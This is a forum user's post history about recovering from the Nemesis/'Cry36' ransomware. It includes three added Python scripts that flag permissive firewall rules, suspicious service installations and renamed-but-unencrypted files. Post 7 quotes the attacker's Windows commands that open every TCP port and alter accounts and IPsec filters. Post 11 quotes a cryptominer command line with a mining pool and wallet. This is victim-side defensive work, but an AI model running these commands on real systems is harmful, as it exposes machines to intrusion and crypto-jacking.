Everything posted by ganymede

  1. Sounds like some sort of syndicate. Ransomware-as-a-service? Could you explain that a little more? When you say anyone can get their own ransomware, do you mean get the app/whatever that initiates the encryption on other machines?
  2. Never mind, apparently it works in Windows 7 at least. Didn't accept my .onion files as being compatible though. :/
  3. I double click the exe inside and nothing happens. That was disappointing...
  4. People need to understand that this forum is hosted by Emsisoft, a company selling anti-malware tools etc. They cannot endorse anything as a solution to this ransomware other than their software (or perhaps some other application from a digitally verified source), if for no other reason than corporate liability. No offense to anyone here trying to help, but if you want to "go rogue", I suggest starting a thread on Bleeping Computer. Knowledge sharing is always welcome though. Sounds to me like the folks here have done all they can with the info at hand. All we can do now is wait and hope people stop paying the ransom so the criminals get bored or something and leak info.
  5. People are unofficially calling it Cry36, not to be confused with Cry128. You may want to ask Emsisoft folks to see if they have a name for it though.
  6. So you think they blocked port 445 so that our systems wouldn't be infected with WannaCry? We must have been the "expeditionary front" of the WannaCry plague to test it out before launching it en masse.
  7. @NnitehawkK-fb, thanks for posting that. It's a script that the hacker ran to open up a bunch of vulnerabilities on your machine, so now I know where to look to plug all the holes. For example, go to the command prompt and type `netsh ipsec static show all` and likely there will be a bunch of filters and whatnot listed that you'll want to remove. Another place you'll want to go to remove stuff is in the Windows Firewall with Advanced Security snap-in to take out the tcp-all rule et al. Here are the commands, cleaned up:
     C:\WINDOWS\system32>ping -n 10
     C:\WINDOWS\system32>net1 user IISUSER$ /del & net1 user IUSR_Servs /del
     C:\WINDOWS\system32>sc config MpsSvc start= auto & net start MpsSvc
     C:\WINDOWS\system32>netsh advfirewall set allprofiles state on
     C:\WINDOWS\system32>netsh advfirewall firewall add rule name="tcp all" dir=in protocol=tcp localport=0-65535 action=allow
     C:\WINDOWS\system32>netsh advfirewall firewall add rule name="deny tcp 445" dir=in protocol=tcp localport=445 action=block
     C:\WINDOWS\system32>netsh advfirewall firewall add rule name="tcpall" dir=out protocol=tcp localport=0-65535 action=allow
     C:\WINDOWS\system32>netsh ipsec static add policy name=win
     C:\WINDOWS\system32>netsh ipsec static add filterlist name=Allowlist
     C:\WINDOWS\system32>netsh ipsec static add filterlist name=denylist
     C:\WINDOWS\system32>netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
     C:\WINDOWS\system32>netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
     C:\WINDOWS\system32>netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
     C:\WINDOWS\system32>netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
     C:\WINDOWS\system32>netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
     C:\WINDOWS\system32>netsh ipsec static add filteraction name=Allow action=permit
     Something curious -- why would they want to deny inbound port 445? Seems like that would be a precautionary thing.
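The post above points at the "tcp all" rule (inbound, TCP, every port, allow) as the thing to remove. On a machine with hundreds of firewall rules that rule is easy to miss, so here is a small Python triage script, added here as an example and not code from the poster, Emsisoft, or the forum: it parses the text that `netsh advfirewall firewall show rule name=all` prints, counts how many local ports each enabled inbound TCP/UDP allow rule exposes, and lists the rules worth reviewing. The sample output embedded below is constructed in the same layout netsh uses (the "tcp all" and "deny tcp 445" rules mirror the names in the attacker's script); the 1024-port threshold and the field names checked are my assumptions. Save the real command's output to a file and pass the path as the first argument to run it against a live host.

```python
"""Flag overly permissive inbound rules in Windows Firewall output.

Input: the text printed by `netsh advfirewall firewall show rule name=all`,
saved to a file. The SAMPLE below is constructed in that layout so the
script can be tried offline; it is not a dump from a real machine.
"""
import re
import sys

# Constructed sample: one attacker-style allow-everything rule, the
# companion port-445 block rule, and a normal RDP rule for contrast.
SAMPLE_NETSH_OUTPUT = """\
Rule Name:                            tcp all
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            In
Profiles:                             Domain,Private,Public
Grouping:
LocalIP:                              Any
RemoteIP:                             Any
Protocol:                             TCP
LocalPort:                            0-65535
RemotePort:                           Any
Edge traversal:                       No
Action:                               Allow

Rule Name:                            deny tcp 445
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            In
Profiles:                             Domain,Private,Public
Grouping:
LocalIP:                              Any
RemoteIP:                             Any
Protocol:                             TCP
LocalPort:                            445
RemotePort:                           Any
Edge traversal:                       No
Action:                               Block

Rule Name:                            Remote Desktop - User Mode (TCP-In)
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            In
Profiles:                             Domain,Private,Public
Grouping:                             Remote Desktop
LocalIP:                              Any
RemoteIP:                             Any
Protocol:                             TCP
LocalPort:                            3389
RemotePort:                           Any
Edge traversal:                       No
Action:                               Allow
"""

# "Field name:   value" lines; the dashed separator and blank lines don't match.
FIELD_RE = re.compile(r"^([A-Za-z ]+):\s*(.*)$")


def parse_rules(text):
    """Split netsh output into one dict per rule, keyed by field name."""
    rules, current = [], None
    for line in text.splitlines():
        if line.startswith("Rule Name:"):
            current = {}
            rules.append(current)
        m = FIELD_RE.match(line)
        if m and current is not None:
            current[m.group(1).strip()] = m.group(2).strip()
    return rules


def port_span(localport):
    """How many ports a LocalPort value covers ("Any" = all 65536).

    Handles single ports, ranges ("0-65535") and comma lists ("80,443");
    symbolic values such as RPC are ignored (counted as 0).
    """
    if localport.strip().lower() == "any":
        return 65536
    total = 0
    for part in localport.split(","):
        part = part.strip()
        if "-" in part:
            lo, hi = (int(x) for x in part.split("-", 1))
            total += hi - lo + 1
        elif part.isdigit():
            total += 1
    return total


def find_overly_permissive(rules, threshold=1024):
    """Names of enabled inbound TCP/UDP Allow rules exposing > threshold ports."""
    hits = []
    for r in rules:
        if (r.get("Enabled") == "Yes" and r.get("Direction") == "In"
                and r.get("Action") == "Allow"
                and r.get("Protocol") in ("TCP", "UDP")
                and port_span(r.get("LocalPort", "Any")) > threshold):
            hits.append(r["Rule Name"])
    return hits


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], errors="replace") as fh:
            text = fh.read()
    else:
        text = SAMPLE_NETSH_OUTPUT
    for name in find_overly_permissive(parse_rules(text)):
        print("review this rule:", name)
```

On the constructed sample only "tcp all" is reported; the block rule is not an allow, and the RDP rule exposes one port. Whatever the script lists still needs a human decision, since some legitimate products also install wide allow rules.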
  8. Most commonly it's been brute force entry via Remote Desktop, though I've been hearing in the news lately that Office 365 and some other feature Windows comes with were also points of entry. I can't remember the name of the other thing off the top of my head but apparently it was a serious enough vulnerability that Microsoft released updates for old OSes as far back as XP.
  9. Ahh this was the company I reached out to as well. They quoted me ~$1900 for 5-7 day service. I opted not to pursue in the hopes that Emsi will come out with something in the near future, but if I need the data sooner, it's good to know now that they're a sure thing. Thanks for the info.
  10. Just an opinion here, but the folks at Emsisoft are doing what they can to provide a FREE service to restore people's files, and for that no one has any reasonable ground on which to complain. I too have wondered as to their status, but with updates like Sarah's, I know that it's not being ignored. How much could they possibly share on a topic that most would likely not understand? For my own situation, I have reached out to a specialist recovery service, and they claim to be able to restore my files for ~$2000, but I am waiting for the folks at Emsisoft because I'm confident they'll come up with something in a reasonable amount of time. And also because no matter the cost to my company, I refuse to negotiate with terrorists. Meanwhile I have been redoing lost work as needed. All in all, still probably less cost than the $2k being quoted. If Fabian and the rest of Emsisoft's brain trust can fix this, you better believe I'm buying their product!
  11. I think this guy might have the actual executable. On a different note, I'm not sure why but I forgot to mention in my original post that I found the service registry of the virus in my Windows logs:
      winlogon.exe -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 48Nk7Q5oB5gEVLabrgo3KhLbaTSDKvZNHBECoHyZcxWNDMgfDnHA8Ue2Skp7A6z2ZGG93wmLxxrKa1j4QR7kmi866AP1G8t -p x Workstationt C:\Windows
      Maybe that long nonsense string has something to do with the key?
  12. George, I'm not sure those bytes are meant to be constant. My last 4 in each file are 35 F6 5C 01. Also to Kenneth and mclaugb, you may have different variants than the one being discussed here, as your extensions end in .onion._. Those were linked to Cry128. Have you tried using the decrypter for it?
  13. Confirmed. Also, and this is probably a "duh, obviously" thing to mention, but check your Windows firewall with advanced security, inbound rules. I was in there whitelisting my RDP ports and noticed that the *&^%$! opened up all ports for tcp connections.
  14. yeah I noticed that some of my picture files (jpg & png) were renamed yet unencrypted too. I wasn't sure if it had to do with the extension or if maybe the virus renamed everything first and then went to encrypting. I would love to try renaming my files back en masse, but I literally have millions of files and I don't want to rename the ones that are actually encrypted because the decrypter won't recognize them then.
  15. I've confirmed the Cry128 decryptor does not work for me either. I tried on 3 sets of files (exe, pdf, and txt) and they all attempted to crack it, but then gave that pop up saying it couldn't be found. I found 3 malicious executables on my machine, but unfortunately I don't think any of them are the actual virus we're dealing with... I think the criminal just put them on the machine. Going through Windows event logs, the actual executable doing the damage was being run through a windows service "Workstationt" and it was running c:\windows\fonts\winlogon.exe -- and this is the file I failed to retrieve. Just before the exe was wiped (by me doing a system restore... and I'm kicking myself for being so hasty about it), Malwarebytes detected winlogon.exe as RiskWare.HeuristicsReservedWordExploit. I can still provide the other 3 executables if you think they will help, though I don't want to give anyone a red herring.
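Posts 11 and 15 above describe how the poster found the culprit: a service named "Workstationt" in the Windows logs, running a file called winlogon.exe out of C:\Windows\fonts with mining-pool arguments (the cryptonight / stratum+tcp command line). Windows records every service installation as System-log event 7045 from the Service Control Manager, with the service name and its command line in the message, so that log is a natural place to look for the same pattern on other machines. The script below is an added example, not code from the forum, the poster or Emsisoft: it parses exported 7045 message text and flags services whose binary carries a well-known Windows system-binary name but lives outside System32/SysWOW64, or whose command line contains miner markers. The sample messages are constructed from the service name and command line quoted in the posts, with the wallet string replaced by a placeholder; the lists of system binary names, system directories and miner markers are my assumptions and meant to be extended.

```python
"""Flag suspicious service installations in exported System-log text.

Windows logs event 7045 (source: Service Control Manager) when a service
is installed; its message carries "Service Name" and "Service File Name"
(the command line). Export those messages as text (Event Viewer can save
the log as text) and feed the file to this script. SAMPLE_EVENTS below is
constructed from the service quoted in the forum posts plus one benign
service; it is not a real log export.
"""
import re
import sys

# Constructed sample, in the layout of a 7045 message body. Raw string so
# the Windows backslashes are kept literally.
SAMPLE_EVENTS = r"""
A service was installed in the system.

Service Name:  Workstationt
Service File Name:  C:\Windows\fonts\winlogon.exe -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u <wallet-address> -p x
Service Type:  user mode service
Service Start Type:  auto start
Service Account:  LocalSystem

A service was installed in the system.

Service Name:  ExampleUpdater
Service File Name:  C:\Program Files\Example\updater.exe --service
Service Type:  user mode service
Service Start Type:  auto start
Service Account:  NT Authority\LocalService
"""

# Assumed indicator lists; extend for your environment.
SYSTEM_BINARIES = {"winlogon.exe", "svchost.exe", "lsass.exe", "csrss.exe",
                   "services.exe", "explorer.exe"}
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
MINER_MARKERS = ("stratum+tcp", "stratum+ssl", "cryptonight", "xmrig")

EVENT_SPLIT = "A service was installed in the system."
FIELD_RE = re.compile(
    r"^(Service Name|Service File Name|Service Account):\s+(.*)$", re.M)
# First token of a command line: a quoted path, or everything up to the first ".exe".
EXE_RE = re.compile(r'^(?:"([^"]+)"|(.+?\.exe))', re.I)


def parse_7045(text):
    """Return one dict per 7045 message with the fields we care about."""
    events = []
    for chunk in text.split(EVENT_SPLIT)[1:]:
        events.append({k: v.strip() for k, v in FIELD_RE.findall(chunk)})
    return events


def exe_path(cmdline):
    """Extract the executable path from a service command line."""
    m = EXE_RE.match(cmdline.strip())
    if not m:
        return cmdline.strip()
    return m.group(1) or m.group(2)


def assess(event):
    """List of reasons a service installation looks suspicious (empty = clean)."""
    reasons = []
    cmd = event.get("Service File Name", "")
    path = exe_path(cmd).lower()
    basename = path.rsplit("\\", 1)[-1]
    # A system-binary name is only expected inside the system directories.
    if basename in SYSTEM_BINARIES and not path.startswith(SYSTEM_DIRS):
        reasons.append(f"system binary name outside system dirs: {path}")
    for marker in MINER_MARKERS:
        if marker in cmd.lower():
            reasons.append(f"miner marker '{marker}' in command line")
    return reasons


def suspicious_services(text):
    """Map service name -> reasons, for every flagged 7045 event in text."""
    findings = {}
    for event in parse_7045(text):
        reasons = assess(event)
        if reasons:
            findings[event.get("Service Name", "?")] = reasons
    return findings


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], errors="replace") as fh:
            text = fh.read()
    else:
        text = SAMPLE_EVENTS
    for name, reasons in suspicious_services(text).items():
        print(name)
        for r in reasons:
            print("   -", r)
```

On the sample, "Workstationt" is reported twice over (wrong directory for winlogon.exe, and two miner markers) while the benign updater is silent. A hit is a reason to pull the binary and the service's install time from the log, not proof by itself.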
  16. Hello,
      Hit sometime last night or this morning, likeliest vector is RDP (though I use strong passwords >:( ). It appears to be the same flavor as bruticus0's given the filenames. Encrypted files have .onion extensions and are 36 bytes larger than the original file. The attached example is an ASCII file, but I can provide a binary if needed. Please note that I got the original by downloading a previous version that was maintained by Google Drive. Google Drive had named the file "mc-generated_tgp1_tbp1_tsr0.667_tmc9_trainset.txt.unified.desc.id_1726307421_fgb45ft3pqamyji7.onion.desc" which wasn't the original name and so I renamed it to what you see attached. Hopefully that doesn't mess anything up for your analysis. I believe people are dubbing this one Cry128?
      I caught the trojan in the act and turned off the machine, so I'll likely be able to provide the virus files tomorrow. Where should I submit those? I've tried the Cry9 and CryptON decryptors and neither worked. The former complained about the 68 bytes as others have posted, the latter gave a popup saying I need to drag both files at the same time (but I definitely did).
      More info... ransom notes are -DECRYPT-MY-FILES.txt and are *not* in every directory. Possibly because like I said I caught it "mid-stream". They make no mention of the culprit (e.g. citing the Nemesis decryptor), however I safely visited the URL given in the note and it said clearly at the top, "NEMESIS Ransomware". Also, in some threads I've been reading, some people have noted no size difference. I've checked several of my files by removing the new extension to bring it back to its original file name, and several of the files were still accessible, i.e. not encrypted. Perhaps if you're seeing no file size difference you should try the same. For me, the files that were apparently unencrypted still had the extra 36 bytes though. I can provide these kinds of files too if desired.
      Along with the virus exe and supporting files, I will be looking for new/altered user accounts, altered local/group security policies, and checking logs for port accesses and anything else that stands out. Let me know if I should look for anything else. And definitely let me know whatever I can do to help this effort. I'm reposting this on the bleepingcomputer.com forum now - https://www.bleepingcomputer.com/forums/t/636865/nemesis-ransomware-support-help-topic/page-4
      Many thanks to everyone spending their well-earned free time on cracking down on these <expletive deleted>.
      -DECRYPT-MY-FILES.txt
      mc-generated_tgp1_tbp1_tsr0.667_tmc9_trainset.txt.unified.desc
      mc-generated_tgp1_tbp1_tsr0.667_tmc9_trainset.txt.unified.desc.id_1726307421_fgb45ft3pqamyji7.onion
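Posts 14 and 16 above raise the same practical problem: some files were renamed with the ransomware's suffix but turned out not to be encrypted (the content was still readable once the extension was removed), and with millions of files nobody wants to rename by hand, least of all the genuinely encrypted ones, which the decrypter has to find under their new names. The script below is an added example, not code from the forum, the poster or Emsisoft. It walks a directory, picks out files whose name ends in the suffix shape seen in the file name quoted above (`.id_<digits>_<tag>.onion`, an assumption taken from that one example), and classifies each one by reading its first bytes: a recognisable file header (JPEG, PNG, PDF, ZIP/Office, EXE) means "renamed only", high byte entropy means "looks encrypted", anything else is left as "unknown". It never renames or modifies anything; it only prints a report, so the encrypted files stay exactly as the decrypter expects them. The magic-byte table, the entropy threshold and the sample files (built in a temporary directory) are my constructions; the 36-byte trailer the post mentions is not needed for this check.

```python
"""Report which ransomware-renamed files still carry their original header.

Read-only triage: nothing is renamed or written except a temporary sample
tree when the script is run without arguments. Usage:
    python triage_onion.py <directory>
"""
import math
import os
import re
import sys
import tempfile

# Suffix shape from the file name quoted in the post: <name>.id_<digits>_<tag>.onion
SUFFIX_RE = re.compile(r"\.id_\d+_[0-9a-z]+\.onion$", re.IGNORECASE)

# A few common file signatures (assumed list; extend for your data).
MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "pdf": b"%PDF",
    "zip": b"PK\x03\x04",   # also docx/xlsx/pptx containers
    "exe": b"MZ",
}

HEAD_BYTES = 4096          # how much of each file to inspect
ENTROPY_THRESHOLD = 7.0    # bits per byte; ciphertext sits close to 8.0


def shannon_entropy(data):
    """Bits of entropy per byte of `data` (0.0 for empty input)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def classify_header(head):
    """Return (verdict, detail) for the first bytes of a renamed file."""
    for kind, magic in MAGIC.items():
        if head.startswith(magic):
            return "renamed-only", f"{kind} header intact"
    ent = shannon_entropy(head)
    if ent >= ENTROPY_THRESHOLD:
        return "encrypted", f"entropy {ent:.2f}"
    return "unknown", f"no known header, entropy {ent:.2f}"


def original_name(name):
    """Name the file had before the suffix was appended."""
    return SUFFIX_RE.sub("", name)


def triage(root):
    """Walk `root`; return {path: (verdict, detail, original_name)} for renamed files."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not SUFFIX_RE.search(name):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                head = fh.read(HEAD_BYTES)
            verdict, detail = classify_header(head)
            report[path] = (verdict, detail, original_name(name))
    return report


def build_sample_tree():
    """Constructed sample directory: one renamed-but-intact PNG, one
    ciphertext-like file, and one untouched file the walker must skip."""
    root = tempfile.mkdtemp(prefix="onion_triage_")
    suffix = ".id_1726307421_fgb45ft3pqamyji7.onion"   # tag from the post
    with open(os.path.join(root, "photo.png" + suffix), "wb") as fh:
        fh.write(MAGIC["png"] + b"\x00" * 2000)
    with open(os.path.join(root, "report.pdf" + suffix), "wb") as fh:
        fh.write(bytes(range(256)) * 16)   # every byte value equally likely: entropy 8.0
    with open(os.path.join(root, "notes.txt"), "wb") as fh:
        fh.write(b"not touched")
    return root


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_tree()
    for path, (verdict, detail, orig) in sorted(triage(target).items()):
        print(f"{verdict:13} {detail:28} {path} -> {orig}")
```

Plain text files carry no header, so they fall into "unknown" unless their entropy is high; a text-heavy tree can add a cheap printable-ratio check to the classifier. Keep the report alongside the files and let the decrypter, once one exists, process the "encrypted" set under the names it was given.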